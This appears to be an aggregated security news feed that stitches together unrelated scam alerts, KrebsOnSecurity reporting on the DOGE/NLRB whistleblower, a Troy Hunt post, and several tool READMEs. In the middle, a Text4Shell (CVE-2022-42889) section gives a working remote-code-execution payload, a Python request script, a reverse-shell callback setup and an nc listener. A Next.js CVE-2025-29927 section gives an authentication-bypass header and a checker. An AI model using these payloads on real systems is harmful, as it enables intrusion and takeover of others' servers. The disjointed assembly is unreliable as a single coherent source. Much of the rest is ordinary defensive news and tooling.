Google is alerting Gmail users to a new type of phishing email that looks like it comes from Google itself. These messages often appear in legitimate email threads and pass all typical security checks, but lead victims to a cloned Google login page designed to steal credentials. The scam highlights how attackers are evolving to outsmart traditional filters.
Read more
McAfee Researchers have observed a recent surge in the following scam types:
Fake Delivery Notifications: Scammers impersonate delivery services like USPS, UPS, and FedEx, sending fake tracking links that install malware or steal payment info
Invoice Scams: Fraudulent messages that claim you owe money for a product or service, often accompanied by a fake invoice PDF or request for payment via phone
Cloud Storage Spoofs: Emails that pretend to be from Google Drive, Dropbox, or OneDrive, prompting you to “log in” to view shared files. The links lead to phishing sites designed to capture your credentials.
Toll Text Scams: Personalized smishing messages that claim you owe a toll and link to fake payment sites. These messages often use location data—like your area code or recent city visits—to appear legitimate. McAfee Labs saw toll scam texts spike nearly 4x between January and February.
This week, Steve Grobman, executive vice president and chief technology officer at McAfee, said the toll scam is effective because it hits all the correct social points for a consumer.
These scams often rely on urgency and familiarity—pretending to be something you trust or expect—to get you to act quickly without double-checking.
Thanks for reading—See you next week with more scam alerts, insights, and protection tips from the McAfee team.
The post This Week in Scams: $16.6 Billion Lost, Deepfakes Rise, and Google Email Scams Emerge appeared first on McAfee Blog.
Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then smartly prioritizes them with highest (most attractive) to lowest (least attractive) from an attacker's playground perspective.
Comprehensive recon:
Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint.
Live asset verification:
Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable.
In-depth web recon:
Collect detailed HTTP response data (via HTTPX) including metadata, technology stack, status codes, content lengths, and more.
Smart prioritization:
Use a composite scoring system that considers homepage status, login identification, technology stack, DNS data, and much more to generate a risk score for each asset, helping bug bounty hunters and pentesters focus on the most promising targets to attack first.
Professional reporting:
Generate a dynamic, colour-coded HTML report with a modern design and dark/light theme toggle.
In this tool, risk scoring is based on the notion of asset attractiveness—the idea that certain attributes or characteristics make an asset more interesting to attackers. If we see more of these attributes, the overall score goes up, indicating a broader "attack surface" that adversaries could leverage. Below is an overview of how each factor contributes to the final risk score.
If the homepage returns a 200 OK, it often means the page is legitimately reachable and responding with content. A 200 OK is more interesting to attackers than a 404 or a redirect, so a 200 status modestly increases the risk. The presence of key security headers is also checked: Strict-Transport-Security (HSTS), X-Frame-Options, Content-Security-Policy, X-XSS-Protection, Referrer-Policy, and Permissions-Policy. Missing or disabled headers mean an endpoint is more prone to common web exploits, so each absent header increments the score.
Each factor above contributes one or more points to the final risk score. Once all factors are tallied, we get a numeric risk score: the higher it is, the more interesting the asset is to an attacker, and the more room it potentially gives pentesters to test around.
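As a conceptual sketch of this kind of composite scoring (not Frogy's actual algorithm; the point values and field names below are illustrative assumptions):
SECURITY_HEADERS = [
    "Strict-Transport-Security", "X-Frame-Options", "Content-Security-Policy",
    "X-XSS-Protection", "Referrer-Policy", "Permissions-Policy",
]

def risk_score(asset: dict) -> int:
    """Tally illustrative attractiveness points for one asset."""
    score = 0
    if asset.get("status_code") == 200:          # reachable and responding with content
        score += 1
    if asset.get("has_login"):                   # login panels are attractive targets
        score += 2
    score += len(asset.get("open_ports", []))    # each open port widens the attack surface
    present = set(asset.get("headers", {}))
    score += sum(1 for h in SECURITY_HEADERS if h not in present)  # each missing header adds a point
    return score

# Example: rank assets from most to least attractive
assets = [{"host": "app.example.com", "status_code": 200, "has_login": True,
           "open_ports": [80, 443], "headers": {"X-Frame-Options": "DENY"}}]
print(sorted(assets, key=risk_score, reverse=True)[0]["host"])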
Why This Matters
This approach helps you quickly prioritize which assets warrant deeper testing. Subdomains with high counts of open ports, advanced internal usage, missing headers, or login panels are more complex, more privileged, or more likely to be misconfigured—therefore, your security team can focus on those first.
Clone the repository and run the installer script to set up all dependencies and tools:
chmod +x install.sh
./install.sh
chmod +x frogy.sh
./frogy.sh domains.txt
https://www.youtube.com/watch?v=LHlU4CYNj1M
____ _ _
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
███▄ █ ▓█████ ▒█████
██ ▀█ █ ▓█ ▀ ▒██▒ ██▒
▓██ ▀█ ██▒▒███ ▒██░ ██▒
▓██▒ ▐▌██▒▒▓█ ▄ ▒██ ██░
▒██░ ▓██░░▒████▒░ ████▓▒░
░ ▒░ ▒ ▒ ░░ ▒░ ░░ ▒░▒░▒░
░ ░░ ░ ▒░ ░ ░ ░ ░ ▒ ▒░
░ ░ ░ ░ ░ ░ ░ ▒
░ ░ ░ ░ ░
PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.
This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.
This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.
Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024
Password: Sobri
Social media tracking
Exploitation & Pentesting
Custom payload generation
Wireless Attacks
WPS exploitation
Web Attacks
CMS scanning
Social Engineering
Credential harvesting
Tracking & Analysis
# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git
# Change directory
cd pegasus-neo
# Install dependencies
sudo python3 -m pip install -r requirements.txt
# Run the tool
sudo python3 pegasus_neo.py
sudo python3 pegasus_neo.py
This is a proprietary project and contributions are not accepted at this time.
For support, please email muhammadsobrimaulana31@gmail.com or visit https://lynk.id/muhsobrimaulana
This project is protected under proprietary license. See the LICENSE file for details.
Made with ❤️ by Letda Kes dr. Sobri
How do seemingly little things manage to consume so much time?! We had a suggestion this week that instead of being able to login to the new HIBP website, you should instead be able to log in. This initially confused me because I've been used to logging on to things for decades:
So, I went and signed in (yep, different again) to X and asked the masses what the correct term was:
When accessing your @haveibeenpwned dashboard, which of the following should you do? Preview screen for reference: https://t.co/9gqfr8hZrY
— Troy Hunt (@troyhunt) April 23, 2025
Which didn't result in a conclusive victor, so, I started browsing around.
Cloudflare's Zero Trust docs contain information about customising the login page, which I assume you can do once you log in:
Another, uh, "popular" site prompts you to log in:
After which you're invited to sign in:
You can log in to Canva, which is clearly indicated by the HTML title, which suggests you're on the login page:
You can log on to the Commonwealth Bank down here in Australia:
But the login page for ANZ bank requires you to log in, unless you've forgotten your login details:
Ah, but many of these are just the difference between the noun "login" (the page is a thing) and the verb "log in" (when you perform an action), right? Well... depends who you bank with 🤷♂️
And maybe you don't log in or login at all:
Finally, from the darkness of seemingly interchangeable terms that may or may not violate principles of English language, emerged a pattern. You also sign in to Google:
And Microsoft:
And Amazon:
And Yahoo:
And, as I mentioned earlier, X:
And now, Have I Been Pwned:
There are some notable exceptions (Facebook and ChatGPT, for example), but "sign in" did emerge as the frontrunner among the world's most popular sites. If I really start to overthink it, I do feel that "log[whatever]" implies something different to why we authenticate to systems today and is more a remnant of a bygone era. But frankly, that argument is probably no more valid than whether you're doing a verb thing or a noun thing.
A whistleblower at the National Labor Relations Board (NLRB) alleged last week that denizens of Elon Musk’s Department of Government Efficiency (DOGE) siphoned gigabytes of data from the agency’s sensitive case files in early March. The whistleblower said accounts created for DOGE at the NLRB downloaded three code repositories from GitHub. Further investigation into one of those code bundles shows it is remarkably similar to a program published in January 2025 by Marko Elez, a 25-year-old DOGE employee who has worked at a number of Musk’s companies.
According to a whistleblower complaint filed last week by Daniel J. Berulis, a 38-year-old security architect at the NLRB, officials from DOGE met with NLRB leaders on March 3 and demanded the creation of several all-powerful “tenant admin” accounts that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.
Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.
Berulis said he discovered one of the DOGE accounts had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever used. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.
A search on that description in Google brings up a code repository at GitHub for a user with the account name “Ge0rg3” who published a program roughly four years ago called “requests-ip-rotator,” described as a library that will allow the user “to bypass IP-based rate-limits for sites and services.”
The README file from the GitHub user Ge0rg3’s page for requests-ip-rotator includes the exact wording of a program the whistleblower said was downloaded by one of the DOGE users. Marko Elez created an offshoot of this program in January 2025.
“A Python library to utilize AWS API Gateway’s large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing,” the description reads.
Ge0rg3’s code is “open source,” in that anyone can copy it and reuse it non-commercially. As it happens, there is a newer version of this project that was derived or “forked” from Ge0rg3’s code — called “async-ip-rotator” — and it was committed to GitHub in January 2025 by DOGE captain Marko Elez.
The whistleblower stated that one of the GitHub files downloaded by the DOGE employees who transferred sensitive files from an NLRB case database was an archive whose README file read: “Python library to utilize AWS API Gateway’s large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Elez’s code pictured here was forked in January 2025 from a code library that shares the same description.
A key DOGE staff member who gained access to the Treasury Department’s central payments system, Elez has worked for a number of Musk companies, including X, SpaceX, and xAI. Elez was among the first DOGE employees to face public scrutiny, after The Wall Street Journal linked him to social media posts that advocated racism and eugenics.
Elez resigned after that brief scandal, but was rehired after President Donald Trump and Vice President JD Vance expressed support for him. Politico reports Elez is now a Labor Department aide detailed to multiple agencies, including the Department of Health and Human Services.
“During Elez’s initial stint at Treasury, he violated the agency’s information security policies by sending a spreadsheet containing names and payments information to officials at the General Services Administration,” Politico wrote, citing court filings.
KrebsOnSecurity sought comment from both the NLRB and DOGE, and will update this story if either responds.
The NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function. Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.
Berulis’s complaint alleges the DOGE accounts at NLRB downloaded more than 10 gigabytes of data from the agency’s case files, a database that includes reams of sensitive records including information about employees who want to form unions and proprietary business documents. Berulis said he went public after higher-ups at the agency told him not to report the matter to the US-CERT, as they’d previously agreed.
Berulis told KrebsOnSecurity he worried the unauthorized data transfer by DOGE could unfairly advantage defendants in a number of ongoing labor disputes before the agency.
“If any company got the case data that would be an unfair advantage,” Berulis said. “They could identify and fire employees and union organizers without saying why.”
Marko Elez, in a photo from a social media profile.
Berulis said the other two GitHub archives that DOGE employees downloaded to NLRB systems included Integuru, a software framework designed to reverse engineer application programming interfaces (APIs) that websites use to fetch data; and a “headless” browser called Browserless, which is made for automating web-based tasks that require a pool of browsers, such as web scraping and automated testing.
On February 6, someone posted a lengthy and detailed critique of Elez’s code on the GitHub “issues” page for async-ip-rotator, calling it “insecure, unscalable and a fundamental engineering failure.”
“If this were a side project, it would just be bad code,” the reviewer wrote. “But if this is representative of how you build production systems, then there are much larger concerns. This implementation is fundamentally broken, and if anything similar to this is deployed in an environment handling sensitive data, it should be audited immediately.”
Further reading: Berulis’s complaint (PDF).
Update 7:06 p.m. ET: Elez’s code repo was deleted after this story was published. An archived version of it is here.
Job scams are on the rise. And asking the right questions can help steer you clear of them.
That rise in job scams is steep, according to the U.S. Federal Trade Commission (FTC). Recent data shows that reported losses have grown five times over between 2020 and 2024. In 2024 alone, reported losses hit half a billion dollars, with unreported losses undoubtedly pushing actual losses yet higher.
Last week, we covered how “pay to get paid” scams account for a big chunk of online job scams. Here, we’ll cover a couple more that we’ve seen circulating on social media and via texts—and how some pointed questions can help you avoid them.
Some job scammers pose as recruiters from job agencies who reach potential victims the same way legitimate agencies do—by email, text, and networking sites. Sometimes this leaves people with their guard down because it’s not unheard of at all to get contacted this way, “out of the blue” so to speak.
Yet one of the quickest ways to spot a scammer is when the “recruiter” asks to pay a fee for the matchmaking, particularly if they ask for it up front. Legitimate headhunters, temp agencies, and staffing agencies typically get paid by the company or business that ultimately does the hiring. Job candidates don’t pay a thing.
Another form of scam occurs during the “onboarding” process of the job. The scammer happily welcomes the victim to the company and then informs them that they’ll need to take some online training and perhaps buy a computer or other office equipment. Of course, the scammer asks the victim to pay for all of it—leaving the victim out of hundreds of dollars and the scammer with their payment info.
One way you can spot a job scam is to press for answers. Asking pointed questions about a company and the job it’s offering, just as you would in any real interview, can reveal gaps in a scammer’s story. In effect, scammers are putting on an acting job, and some don’t thoroughly prepare for their role. They don’t think through the details, hoping that victims will be happy enough about a job prospect to ask too many questions.
If the hiring process moves quicker than expected or details about a job seem light, it’s indeed time to ask questions. Here are a few you can keep handy when you start to wonder if you have a scam on your hands …
Can you share a full job description?
This is a great place to start. Legitimate employers write up job listings that they post on their website and job sites. In those descriptions, the work and everything it entails gets spelled out to the letter. A real employer should be able to provide you with a job description or at least cover it clearly over the course of a conversation.
Where is the company located?
This one can trip up a scammer quickly. A scammer might avoid giving a physical address, or they might offer up a fake one. Either a non-answer or a lie can be exposed by following up the question with a web search for the address. (Resources like the Better Business Bureau can also help you research a company and its track record.)
Who will I be working with?
Asking about co-workers, bosses, reporting structures and the like can also help sniff out a scam. Real employers, once again, will have ready answers here. They might even start dropping names and details about people’s tenure and background. Meanwhile, this is one more place where scammers might tip their hand because they haven’t made up those details.
What does the hiring process look like?
This question alone can offer a telltale sign. Many job scams move through the hiring process at breakneck speed, skipping past the usual interview loops and callbacks that many legitimate jobs have. Scammers want to turn over their victims quickly, so they’ll make the “hiring process” quick as well. If it feels like you’re blazing through the steps, it could be a scam.
Can you tell me about the company’s history?
Every business has a story, even if it’s still in its startup days. Anyone in a recruiting or hiring position will have a good handle on this question, as they will on any follow-up questions about the company’s mission or goals. Again, vagueness in response to these kinds of questions could be a sign of a scam.
Whether it’s through social media sites like Facebook, Instagram, and the like, scammers often reach out through direct messages. Legitimate recruiters stick to established business networking sites like LinkedIn. Companies maintain established accounts on recruiting platforms that people know and trust, so view any contact outside of them as suspicious.
Scammers use the “hiring process” to trick people into handing over their personal info via malicious links. Web protection, included in our plans, can steer you clear of them. Likewise, our Scam Detector scans URLs in your text messages and alerts you if they’re sketchy. If you accidentally click a bad link, both web and text scam protection will block a risky site.
Many scammers get your contact info from data broker sites. McAfee’s Personal Data Cleanup scans some of the riskiest data broker sites, shows you which ones are selling your personal info, and, depending on your plan, can help you remove it. Our Social Privacy Manager lowers your public profile even further. It helps you adjust more than 100 privacy settings across your social media accounts in just a few clicks, so your personal info is only visible to the people you want to share it with.
The post Interviewing for a Job? Spot a Scam with These Questions appeared first on McAfee Blog.
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.
Tested against:
- Apache Commons Text < 1.10.0
- Java applications using ${script:...} interpolation from untrusted input
Usage:
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
Example:
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
Start a listener to catch the reverse shell:
nc -nlvp 4444
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell is sent via the /data parameter using a POST request.
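Stripped to its essentials, a PoC like this is just one HTTP request. The following is a minimal Python sketch of the idea, not the script itself: the /data route and the data parameter are taken from the description above and will differ between targets, and the command is left generic rather than wiring in a reverse shell.

import sys
import requests

def build_payload(cmd):
    # CVE-2022-42889: the "script" string interpolator hands the expression to the
    # JVM's JavaScript engine, so any input reaching StringSubstitutor interpolation
    # can call java.lang.Runtime.exec().
    return "${script:javascript:java.lang.Runtime.getRuntime().exec('%s')}" % cmd

def send(target, cmd):
    # The /data route and the "data" parameter are assumptions from the PoC
    # description above; adapt both to the target application.
    resp = requests.post(target.rstrip("/") + "/data",
                         data={"data": build_payload(cmd)},
                         timeout=10)
    print("[+] HTTP %s - payload delivered" % resp.status_code)

if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: python3 %s <target_base_url> <command>" % sys.argv[0])
    send(sys.argv[1], sys.argv[2])

Note that Runtime.exec() splits the command on whitespace and does not invoke a shell, so pipes and redirection won't work directly; published reverse-shell payloads typically wrap the command in bash -c with encoding tricks to get around that.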
A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).
The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom x-middleware-subrequest header.
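Under the hood, the check boils down to comparing a normal request against one carrying that header. Here is a rough Python sketch of the idea; the header value shown is one publicly documented variant, and ghost-route itself may try different values depending on the Next.js version.

import sys
import requests

# One publicly documented bypass value: the middleware module name repeated enough
# times to trip Next.js's internal recursion limit. Older releases used
# "pages/_middleware"; a thorough checker would try several variants.
BYPASS = {"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"}

def check(base_url, path="/admin"):
    normal = requests.get(base_url + path, allow_redirects=False, timeout=10)
    bypass = requests.get(base_url + path, headers=BYPASS, allow_redirects=False, timeout=10)
    # If the protected route normally blocks or redirects but returns 200 with the
    # header set, the middleware was skipped.
    blocked = normal.status_code in (301, 302, 307, 308, 401, 403)
    return blocked and bypass.status_code == 200

if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else "https://example.com"
    print("Likely vulnerable" if check(url) else "No bypass observed")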
Next.js versions affected:
- 11.1.4 and up
[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
Clone the repo
git clone https://github.com/takumade/ghost-route.git
cd ghost-route
Create and activate virtual environment
python -m venv .venv
source .venv/bin/activate
Install dependencies
pip install -r requirements.txt
python ghost-route.py <url> <path> <show_headers>
<url>: Base URL of the Next.js site (e.g., https://example.com)
<path>: Protected path to test (default: /admin)
<show_headers>: Show response headers (default: False)
Basic Example
python ghost-route.py https://example.com /admin
Show Response Headers
python ghost-route.py https://example.com /admin True
MIT License
A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk‘s Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusually large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.
The cover letter from Berulis’s whistleblower statement, sent to the leaders of the Senate Select Committee on Intelligence.
The allegations came in an April 14 letter to the Senate Select Committee on Intelligence, signed by Daniel J. Berulis, a 38-year-old security architect at the NLRB.
NPR, which was the first to report on Berulis’s whistleblower complaint, says NLRB is a small, independent federal agency that investigates and adjudicates complaints about unfair labor practices, and stores “reams of potentially sensitive data, from confidential information about employees who want to form unions to proprietary business information.”
The complaint documents a one-month period beginning March 3, during which DOGE officials reportedly demanded the creation of all-powerful “tenant admin” accounts in NLRB systems that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.
Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.
Berulis writes that on March 3, a black SUV accompanied by a police escort arrived at his building — the NLRB headquarters in Southeast Washington, D.C. The DOGE staffers did not speak with Berulis or anyone else in NLRB’s IT staff, but instead met with the agency leadership.
“Our acting chief information officer told us not to adhere to standard operating procedure with the DOGE account creation, and there was to be no logs or records made of the accounts created for DOGE employees, who required the highest level of access,” Berulis wrote of their instructions after that meeting.
“We have built in roles that auditors can use and have used extensively in the past but would not give the ability to make changes or access subsystems without approval,” he continued. “The suggestion that they use these accounts was not open to discussion.”
Berulis found that on March 3 one of the DOGE accounts created an opaque, virtual environment known as a “container,” which can be used to build and run programs or scripts without revealing its activities to the rest of the world. Berulis said the container caught his attention because he polled his colleagues and found none of them had ever used containers within the NLRB network.
Berulis said he also noticed that early the next morning — between approximately 3 a.m. and 4 a.m. EST on Tuesday, March 4 — there was a large increase in outgoing traffic from the agency. He said it took several days of investigating with his colleagues to determine that one of the new accounts had transferred approximately 10 gigabytes worth of data from the NLRB’s NxGen case management system.
Berulis said neither he nor his co-workers had the necessary network access rights to review which files were touched or transferred — or even where they went. But his complaint notes the NxGen database contains sensitive information on unions, ongoing legal cases, and corporate secrets.
“I also don’t know if the data was only 10gb in total or whether or not they were consolidated and compressed prior,” Berulis told the senators. “This opens up the possibility that even more data was exfiltrated. Regardless, that kind of spike is extremely unusual because data almost never directly leaves NLRB’s databases.”
Berulis said he and his colleagues grew even more alarmed when they noticed nearly two dozen login attempts from a Russian Internet address (83.149.30.186) that presented valid login credentials for a DOGE employee account — one that had been created just minutes earlier. Berulis said those attempts were all blocked thanks to rules in place that prohibit logins from non-U.S. locations.
“Whoever was attempting to log in was using one of the newly created accounts that were used in the other DOGE related activities and it appeared they had the correct username and password due to the authentication flow only stopping them due to our no-out-of-country logins policy activating,” Berulis wrote. “There were more than 20 such attempts, and what is particularly concerning is that many of these login attempts occurred within 15 minutes of the accounts being created by DOGE engineers.”
According to Berulis, the naming structure of one Microsoft user account connected to the suspicious activity suggested it had been created and later deleted for DOGE use in the NLRB’s cloud systems: “DogeSA_2d5c3e0446f9@nlrb.microsoft.com.” He also found other new Microsoft cloud administrator accounts with nonstandard usernames, including “Whitesox, Chicago M.” and “Dancehall, Jamaica R.”
On March 5, Berulis documented that a large section of logs for recently created network resources were missing, and a network watcher in Microsoft Azure was set to the “off” state, meaning it was no longer collecting and recording data like it should have.
Berulis said he discovered someone had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever use. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.
The complaint alleges that by March 17 it became clear the NLRB no longer had the resources or network access needed to fully investigate the odd activity from the DOGE accounts, and that on March 24, the agency’s associate chief information officer had agreed the matter should be reported to US-CERT. Operated by the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), US-CERT provides on-site cyber incident response capabilities to federal and state agencies.
But Berulis said that between April 3 and 4, he and the associate CIO were informed that “instructions had come down to drop the US-CERT reporting and investigation and we were directed not to move forward or create an official report.” Berulis said it was at this point he decided to go public with his findings.
An email from Daniel Berulis to his colleagues dated March 28, referencing the unexplained traffic spike earlier in the month and the unauthorized changing of security controls for user accounts.
Tim Bearese, the NLRB’s acting press secretary, told NPR that DOGE neither requested nor received access to its systems, and that “the agency conducted an investigation after Berulis raised his concerns but ‘determined that no breach of agency systems occurred.'” The NLRB did not respond to questions from KrebsOnSecurity.
Nevertheless, Berulis has shared a number of supporting screenshots showing agency email discussions about the unexplained account activity attributed to the DOGE accounts, as well as NLRB security alerts from Microsoft about network anomalies observed during the timeframes described.
As CNN reported last month, the NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function.
“Despite its limitations, the agency had become a thorn in the side of some of the richest and most powerful people in the nation — notably Elon Musk, Trump’s key supporter both financially and arguably politically,” CNN wrote.
Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.
Berulis shared screenshots with KrebsOnSecurity showing that on the day NPR published its story about his claims (April 14), the deputy CIO at NLRB sent an email stating that administrative control had been removed from all employee accounts. Meaning, suddenly none of the IT employees at the agency could do their jobs properly anymore, Berulis said.
An email from the NLRB’s associate chief information officer Eric Marks, notifying employees they will lose security administrator privileges.
Berulis shared a screenshot of an agency-wide email dated April 16 from NLRB director Lasharn Hamilton saying DOGE officials had requested a meeting, and reiterating claims that the agency had no prior “official” contact with any DOGE personnel. The message informed NLRB employees that two DOGE representatives would be detailed to the agency part-time for several months.
An email from the NLRB Director Lasharn Hamilton on April 16, stating that the agency previously had no contact with DOGE personnel.
Berulis told KrebsOnSecurity he was in the process of filing a support ticket with Microsoft to request more information about the DOGE accounts when his network administrator access was restricted. Now, he’s hoping lawmakers will ask Microsoft to provide more information about what really happened with the accounts.
“That would give us way more insight,” he said. “Microsoft has to be able to see the picture better than we can. That’s my goal, anyway.”
Berulis’s attorney told lawmakers that on April 7, while his client and legal team were preparing the whistleblower complaint, someone physically taped a threatening note to Mr. Berulis’s home door with photographs — taken via drone — of him walking in his neighborhood.
“The threatening note made clear reference to this very disclosure he was preparing for you, as the proper oversight authority,” reads a preface by Berulis’s attorney Andrew P. Bakaj. “While we do not know specifically who did this, we can only speculate that it involved someone with the ability to access NLRB systems.”
Berulis said the response from friends, colleagues and even the public has been largely supportive, and that he doesn’t regret his decision to come forward.
“I didn’t expect the letter on my door or the pushback from [agency] leaders,” he said. “If I had to do it over, would I do it again? Yes, because it wasn’t really even a choice the first time.”
For now, Mr. Berulis is taking some paid family leave from the NLRB. Which is just as well, he said, considering he was stripped of the tools needed to do his job at the agency.
“They came in and took full administrative control and locked everyone out, and said limited permission will be assigned on a need basis going forward,” Berulis said of the DOGE employees. “We can’t really do anything, so we’re literally getting paid to count ceiling tiles.”
Further reading: Berulis’s complaint (PDF).
Bytes Revealer is a powerful reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features like hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract valuable information from any binary file.
Bytes Revealer does NOT store any files or data. All analysis is performed in your browser.
Current limitation: files smaller than 50MB support all analysis features; larger files, up to 1.5GB, are limited to Visual View and Hex View analysis.
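To give a sense of what entropy calculation and string extraction involve, here is a small Python sketch. It is not Bytes Revealer's code (the tool runs entirely in the browser), just an illustration of the same ideas.

import math
import re
import sys

def shannon_entropy(data: bytes) -> float:
    # Entropy near 8 bits/byte suggests compressed or encrypted content;
    # much lower values suggest text or sparse data.
    if not data:
        return 0.0
    total = len(data)
    counts = [data.count(b) for b in set(data)]
    return -sum(c / total * math.log2(c / total) for c in counts)

def extract_strings(data: bytes, min_len: int = 4):
    # Runs of printable ASCII, the same idea as the classic `strings` utility.
    return [m.group().decode() for m in re.finditer(rb"[ -~]{%d,}" % min_len, data)]

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read()
    print("entropy: %.2f bits/byte" % shannon_entropy(blob))
    print("\n".join(extract_strings(blob)[:20]))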
# Node.js 14+ is required
node -v
docker-compose build --no-cache
docker-compose up -d
Now open your browser: http://localhost:8080/
To stop the docker container
docker-compose down
# Clone the repository
git clone https://github.com/vulnex/bytesrevealer
# Navigate to project directory
cd bytesrevealer
# Install dependencies
npm install
# Start development server
npm run dev
# Build the application
npm run build
# Preview production build
npm run preview
- File Upload: progress bar shows upload and analysis status
- Analysis Views: real-time updates as you navigate
- Search Functions: results are highlighted in the current view
- String Analysis
Contributing:
- Create your feature branch (git checkout -b feature/AmazingFeature)
- Commit your changes (git commit -m 'Add some AmazingFeature')
- Push to the branch (git push origin feature/AmazingFeature)
This project is licensed under the MIT License - see the LICENSE.md file for details.
Follow these steps to set up and run the API project:
git clone https://github.com/adriyansyah-mf/CentralizedFirewall
cd CentralizedFirewall
Set up the .env file: update the environment variables in .env according to your configuration.
nano .env
docker compose up -d
This will start the API in detached mode.
Check if the containers are up:
docker ps
To stop the containers:
docker compose down
To restart them:
docker compose restart
sudo dpkg -i firewall-client_deb.deb
nano /usr/local/bin/config.ini
[settings]
api_url = API-URL
api_key = API-KEY
hostname = Node Hostname (make it unique and same as the hostname on the SIEM)
systemctl daemon-reload
systemctl start firewall-agent
systemctl status firewall-agent
Username: admin
Password: admin
You can change the default credentials on the settings page.
curl -X 'POST' \
'http://api-server:8000/general/add-ip?ip=123.1.1.99&hostname=test&apikey=apikey&comment=log' \
-H 'accept: application/json' \
-d ''
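The same call can be made from Python if that's more convenient. The parameter names below are copied from the curl example above; the host and API key are placeholders.

import requests

# Placeholder values; substitute your own API server, key, and IP address.
params = {
    "ip": "123.1.1.99",
    "hostname": "test",
    "apikey": "apikey",
    "comment": "log",
}
resp = requests.post("http://api-server:8000/general/add-ip",
                     params=params,
                     headers={"accept": "application/json"})
print(resp.status_code, resp.text)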
You can view the Swagger documentation at the following link:
http://api-server:8000/docs
DB=changeme
JWT_SECRET=changeme
PASSWORD_SALT=changeme
PASSWORD_TOKEN_KEY=changeme
OPENCTI_URL=changeme
OPENCTI_TOKEN=changeme
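These placeholder values should not be left as-is. One quick way to generate strong random secrets (just an option, not something the project prescribes) is Python's secrets module:

python -c "import secrets; print(secrets.token_hex(32))"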
If you find this project helpful, consider supporting me through GitHub Sponsors